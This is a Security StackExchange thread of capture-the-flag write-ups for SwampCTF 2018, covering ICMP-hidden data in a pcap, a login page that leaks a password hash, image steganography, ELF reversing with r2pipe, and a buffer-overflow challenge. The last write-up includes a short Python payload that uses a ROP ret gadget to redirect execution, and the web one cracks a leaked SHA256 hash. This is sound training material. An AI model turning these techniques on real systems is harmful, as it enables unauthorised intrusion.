# Write-ups: SwampCTF 2018, Thu 29 March 2018 at 22:00 UTC, lasts 48 hours

Tags: discussion, ctf, write-up

Let's participate in [SwampCTF 2018](https://swampctf.com/).

SwampCTF is a Jeopardy-style CTF and lasts 48 hours. Challenges are from a range of categories like Cryptography, Forensics, Reverse Engineering, Binary Exploitation, etc.

You can find additional details on the [CTFtime event page](https://ctftime.org/event/590).

---

General info:

- We compete as team sec.se.
- We communicate over [Slack](https://sec-ctf.slack.com/). To get an invitation to the group you can contact any member of the team. (We will need to know an email address to send the invitation to and a reference to your Security.SE profile.)
- For questions, join us in the [public chat room](https://chat.stackexchange.com/rooms/151/the-dmz).

Good luck everyone!

---

We ranked 136th with 1399 points!

[image: ranking and category breakdown]

Thanks everyone!

Answer (score 5):

## Forensics Orcish

### Challenge description:

An army of orcs was spotted not too far from town. We were listening in on some of their communications but we have not been able to find anything containing their battle plans. Maybe they are disguising the messages some how..

[data.pcap](https://github.com/Hamz-a/MyCTFWriteUps/blob/master/swampctf_2018/Forensics_Orcish/files/data.pcap)

---

### Solution:

We were given a pcap file and we had to somehow find hidden messages. The statistics tools of wireshark can give some great general insight of the traffic. I usually start from there and view the "Conversations", "Endpoints" and if there's HTTP traffic, I view the requests. I also try to scroll through the packets very fast and try to see if there's any anomaly:

[image: statistics tools]

While scrolling through the packets, there were a lot of HTTP traffic. So I viewed the HTTP requests under Statistics:

[image: http requests]

Some update/ubuntu/steam related stuff, not very interesting. Moving on to the end of the captured packets, I noticed a stream of (malformed?) ICMP packets:

[image: malformed icmp packets]

The first ICMP packet had a type of `71`, the second one had a type of `73` and the third had a type of `70`, followed by `56` and `57`. Does this sound familiar? :_)

[image: ICMP types to chr]

There's probably a GIF file hidden in the ICMP packets! Since I didn't want to extract all bytes by hand I wrote a small script with [pyshark](https://github.com/KimiNewt/pyshark):

```
import pyshark

cap = pyshark.FileCapture('./data.pcap', display_filter='icmp')
data = ''

for packet in cap:
    data += chr(int(packet['icmp'].type))

with open('result.gif', 'w') as f:
    f.write(data)
print 'done'
```

Unfortunately the GIF file was corrupt and couldn't view it, but it contained `lol nice job`?!

[image: lol nice job]

I must be close I thought. After analyzing the packets, I noticed that most of the ICMP packets were sent by `Cybertan c8:3d:d4:7a:f3:47` but some were sent by Cisco. It turns out that the router/recipient was replying to some of the packets. I decided to filter the packets to only include packets from `c8:3d:d4:7a:f3:47`:

```
import pyshark

cap = pyshark.FileCapture('./data.pcap', display_filter='icmp')
data = ''

for packet in cap:
    if packet.eth.src == 'c8:3d:d4:7a:f3:47':
        data += chr(int(packet['icmp'].type))

with open('done.gif', 'w') as f:
    f.write(data)
print 'done'
```

This time, the GIF file was not corrupt!

[image: healthy gif file]

Answer (score 5):

## Web The Vault

### Challenge description:

Has it been days? Weeks? You can't remember how long you've been standing at the door to the vault.
You can't remember the last time you slept
or ate,
or had a drop of water, for that matter.
But all of that is insignificant, in the presence of the untold fortunes that must lie just beyond the threshold.

But the door. It won't budge. It says it will answer only to the DUNGEON_MASTER.
Have you not shown your worth?
But more than that,
It demands to know your secrets.

Nothing you've tried has worked.
You've pled, begged, cursed, but the door holds steadfast, harshly judging your failed requests.

But with each failed attempt you start to notice more and more
that there's something peculiar about the way the door responds to you.

Maybe the door knows more than it's letting on.
...Or perhaps it's letting on more than it knows?

**NOTE: DO NOT USE AUTOMATED TOOLS**

Connect http://chal1.swampctf.com:2694

---

### Solution:

We are presented with a login screen and since this is a web challenge, I tend to use my favourite http proxy: Burp. This allows me to view all traffic received/sent from the webserver. Sending `foobar` as username and `bazqux` as password, the UI pops up an alert stating "invalid credentials". Burp however intercepted the following response:

```
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>No such user: foobar</pre>
</body>
</html>
```

There's some JavaScript magic in the webpage that of course handles this. The website and the challenge description both state that only the `DUNGEON_MASTER` may enter the vault, let's try that as username:

[image: only dungeon master may enter]

Wrong credentials again but the response was different this time:

```
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>test_hash [972c5e1203896784a7cf9dd60acd443a1065e19ad5f92e59a9180c185f065c04]
 does not match 
real_hash[40f5d109272941b79fdf078a0e41477227a9b4047ca068fff6566104302169ce]</pre>
</body>
</html>
```

The passwords are hashed but showing the expected hash in the response is definitely not right. Turns out that the hashing algorithm is SHA256.
Next step is to figure out the original value of the hash. Since hashing algorithms are one way, there's no way to turn back unless we use bruteforce, rainbow tables or just google for websites with huge databases that have done this before. Some sites didn't contain the hash but the following did: https://crackstation.net/ . The original value for hash `40f5d109272941b79fdf078a0e41477227a9b4047ca068fff6566104302169ce`
is `smaug123`.

Get flag!

[image: get flag]

Btw, here's a nice tool for hash identification: https://github.com/psypanda/hashID

Answer (score 4):

## Forensics Wild Night Out

### Challenge description:

That sure was a wild night at the old tavern.
Good thing someone was able to draw the scene for us to remember.
But the more I look at the picture, the more it seems that something isn't quite right...

[image: tavern night]

---

### Solution:

Our team member [@Tom K.](https://security.stackexchange.com/users/86741/tom-k) ran all kinds of tools against the image (foremost, binwalk, stegsolve etc.) and nothing came up. The description kind of hinted to look at the picture, so what else to do than use GIMP and try to mess with the colors?

[image: tavern night edited]

The flag could be read at the top of the image.

Answer (score 4):

## Reversing Dragon's horde

### Challenge description:

You are a member of the dragon slayer's guild within your town.
Word comes to the guild of a dragon seen in a nearby mountain range.
You and your party decide to go out and slay the beast.
There is surely great wealth and glory to be obtained.
But be careful, dragons can be tricky creatures to deal with.

[adventure](https://github.com/Hamz-a/MyCTFWriteUps/blob/master/swampctf_2018/Reversing_Dragons_horde/files/adventure)

---

### Solution:

We were given a 32-bit ELF file:

```
$ file adventure
adventure: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ed180ea5005352722a4eacb827629c058c89e56e, not stripped
```

I tried to run it but got:

```
$ ./adventure 
./adventure: /usr/lib/i386-linux-gnu/libstdc++.so.6: version `GLIBCXX_3.4.21' not found (required by ./adventure)
```

Spent a few minutes trying to fix this error and then thought "Since it's a 32-bit binary, let's drop it in [retdec.com](https://retdec.com/decompilation/)".

Retdec is an online decompilation service, it currently only supports 32-bit binaries. The decompilation is not perfect (a pretty hard problem) but it's enough for us. Here's an excerpt of the C decompiled file:

```
//
// This file was generated by the Retargetable Decompiler
// Website: https://retdec.com
// Copyright (c) 2018 Retargetable Decompiler <info@retdec.com>
//
// ------------------------ Functions -------------------------

// Address range: 0x8048990 - 0x80489bf
void __ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6___GLIBCXX_3_4(void) {
    // 0x8048990
    return;
}

// Address range: 0x8048b0b - 0x8048b2c
// Demangled:     foo1()
int32_t _Z4foo1v(void) {
    // 0x8048b0b
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 102);
    return 102;
}

// Address range: 0x8048b2d - 0x8048b4e
// Demangled:     foo2()
int32_t _Z4foo2v(void) {
    // 0x8048b2d
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 108);
    return 108;
}

// Address range: 0x8048b4f - 0x8048b70
// Demangled:     foo3()
int32_t _Z4foo3v(void) {
    // 0x8048b4f
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 97);
    return 97;
}

// Address range: 0x8048b71 - 0x8048b92
// Demangled:     foo4()
int32_t _Z4foo4v(void) {
    // 0x8048b71
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 103);
    return 103;
}

// Address range: 0x8048b93 - 0x8048bb4
// Demangled:     foo5()
int32_t _Z4foo5v(void) {
    // 0x8048b93
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 123);
    return 123;
}

// Address range: 0x8048bb5 - 0x8048bd6
// Demangled:     foo6()
int32_t _Z4foo6v(void) {
    // 0x8048bb5
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 114);
    return 114;
}

// Address range: 0x8048bd7 - 0x8048bf8
// Demangled:     foo7()
int32_t _Z4foo7v(void) {
    // 0x8048bd7
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 51);
    return 51;
}

// Address range: 0x8048bf9 - 0x8048c1a
// Demangled:     foo8()
int32_t _Z4foo8v(void) {
    // 0x8048bf9
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 118);
    return 118;
}

// Address range: 0x8048c1b - 0x8048c3c
// Demangled:     foo9()
int32_t _Z4foo9v(void) {
    // 0x8048c1b
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 95);
    return 95;
}

// Address range: 0x8048c3d - 0x8048c5e
// Demangled:     foo10()
int32_t _Z5foo10v(void) {
    // 0x8048c3d
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 49);
    return 49;
}

// Address range: 0x8048c5f - 0x8048c80
// Demangled:     foo11()
int32_t _Z5foo11v(void) {
    // 0x8048c5f
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 116);
    return 116;
}

// Address range: 0x8048c81 - 0x8048ca2
// Demangled:     foo12()
int32_t _Z5foo12v(void) {
    // 0x8048c81
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 95);
    return 95;
}

// Address range: 0x8048ca3 - 0x8048cc4
// Demangled:     foo13()
int32_t _Z5foo13v(void) {
    // 0x8048ca3
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 117);
    return 117;
}

// Address range: 0x8048cc5 - 0x8048ce6
// Demangled:     foo14()
int32_t _Z5foo14v(void) {
    // 0x8048cc5
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 112);
    return 112;
}

// Address range: 0x8048ce7 - 0x8048d08
// Demangled:     foo15()
int32_t _Z5foo15v(void) {
    // 0x8048ce7
    _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEc((int32_t)&g5, 125);
    return 125;
}

// Address range: 0x8048d09 - 0x8049422
int main(int argc, char ** argv) {
 // redacted
}
```

We have `foo[1-15]` functions and a main function. The foo functions return certain values. If we convert these integers to their respective ASCII values, we get the flag.

The above approach is a bit lame, so let's solve this in another way with [radare2](https://github.com/radare/radare2). r2 is a reverse engineering framework, it can be automated with [r2pipe](https://github.com/radare/radare2-r2pipe). So I wrote the following script in order to extract the flag from the functions:

```
import r2pipe

print("[+] Opening binary...")
r2 = r2pipe.open("./adventure")

print("[+] Analysing the binary...")
r2.cmd("aaa")

print("[+] Looping through foo[1-15] functions...")
flag = ''
for i in range(1, 16):
    print("[+] Disassembling foo%s function..." % i)
    instructions = r2.cmdj("pdj 4 @sym.foo" + str(i))  # Get first 4 assembled instructions
    opcode = instructions[-1]['opcode'].strip()  # Get last instruction
    character = chr(int(opcode[-4:], 16))  # Convert hex character from opcode to ASCII
    print("Opcode: " + opcode + ", chr: " + character)
    flag += character

print("flag: " + flag)
```

Here's the script's output:

[image: r2 rocks]

Comment: Oh and if someone knows how to fix the glibc error in the beginning I would be grateful! I'm using a vagrant box called [cgpwn](https://github.com/0xM3R/cgPwn) and the following [answer](https://askubuntu.com/a/421795) didn't work.

Answer (score 4):

## Pwning Apprentice's return

### Challenge description:

For one such as yourself, apprentice to the arts of time manipulation, you must pass this first trial with a dreadful creature.

**Connect:**
nc chal1.swampctf.com 1802

-=Created By: TobalJackson=-

[return](https://github.com/Hamz-a/MyCTFWriteUps/blob/master/swampctf_2018/Pwning_Apprentices_Return/files/return)

---

### Solution:

We were given an unstripped 32-bit ELF binary:

```
$ file return 
return: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=5e510acf107cc9f91edd02f76f14598fcb30de6b, not stripped
```

First thing to know when pwning a binary is to check the security measures enabled:

```
$ checksec return 
[*] '/home/vagrant/sharedFolder/ctf/swamp/apprentice_return/return'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
```

So the most important thing to keep in mind is that the NX bit is set which stands for [No-eXecutable](https://en.wikipedia.org/wiki/NX_bit). Let's open the binary in [Binary Ninja](https://binary.ninja/). The main function is quite straightforward, it calls the `doBattle()` function, after that it prints some text:

[image: main disas]

I guess the `doBattle()` is the function we're supposed to pwn. However, it is worth noticing another interesting function in the functions list called `slayTheBeast()`:

[image: slayTheBeast disas]

This function basically `cat`s the flag for us. Which means we probably need to somehow jump to this function. Let's examine the `doBattle()` function:

[image: doBattle disas]

The function prints some text, then reads a max of 50 characters. A weird thing to notice is that it performs a check for the value at offset 42 from the read characters and compares it with `0x08048595`. This corresponds to the end of the `doBattle()` function:

```
0x08048595      leave
0x08048596      ret
```

After playing with the binary with gdb, it becomes clear that the `doBattle()` function suffers from a buffer overflow vulnerability. The offset to overwrite `EIP` is 42. There was a problem however when using the vanilla "payload testing" method: `A * 42 + BBBB`.

The check mentioned previously will basically let us fail since `BBBB` translates to `0x42424242` which is bigger than `0x08048595`, so I changed the payload to `A * 42 + \x01 * 4`:

[image: testing the payload]

After stepping a bit, it seems we're on the right path:

[image: right offset]

Now we need to jump to `slayTheBeast()` function, however this function resides at address `0x080485db`. The previously mentioned check will prevent us from jumping to it directly since the address to jump to needs to be smaller than `0x08048595`. Let's search for some [ROP gadgets](https://en.wikipedia.org/wiki/Return-oriented_programming) using [peda](https://github.com/longld/peda):

```
gdb-peda$ ropgadget
ret = 0x804835a
popret = 0x8048371
pop2ret = 0x804868a
pop4ret = 0x8048688
pop3ret = 0x8048689
addesp_12 = 0x804836e
addesp_16 = 0x8048465
```

The `ret` at `0x0804835a` will do the job since it's smaller than `0x08048595` and it will allow us to return/jump to the `slayTheBeast()` function which will follow right after it. Our final payload will look like this: `A * 42 + ret + slayTheBeast`. In practice, this simple Python script will do the job:

```
from struct import pack

payload = 'A' * 42                 # offset
payload += pack('<I', 0x804835a)   # ret gadget to bypass check (addr must be lower than 0x8048595)
payload += pack('<I', 0x080485db)  # slayTheBeast() addr

print payload
```

It's important when using `cat` to keep `stdin` open with `-`:

[image: get flag]